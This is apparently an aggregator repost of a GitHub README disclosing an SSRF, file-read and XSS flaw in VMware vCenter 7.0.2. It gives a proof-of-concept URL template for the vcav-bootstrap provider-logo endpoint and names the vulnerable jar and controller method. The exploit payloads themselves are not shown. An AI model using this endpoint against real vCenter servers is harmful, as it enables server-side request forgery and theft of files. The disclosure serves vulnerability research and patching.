code-scan starred VMware_vCenter
2021-12-04 01:12:19 Author: github.com(查看原文) 阅读量:64 收藏

POC

https://{vCenterserver}/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url={url}

File read:

SSRF + XSS:

vulnerable code:

/etc/vmware/vsphere-ui/cm-service-packages/com.vmware.cis.vsphereclient.plugin/com.vmware.h4.vsphere.client-0.4.1.0/plugins/h5-vcav-bootstrap-service.jar

com.vmware.h4.vsphere.ui.bootstrap.controller.ProvidersController.getProviderLogo()

Tested on vCenter 7.0.2.00100, not knowing the exact affected version range or cve id


文章来源: https://github.com/l0ggg/VMware_vCenter
如有侵权请联系:admin#unsafe.sh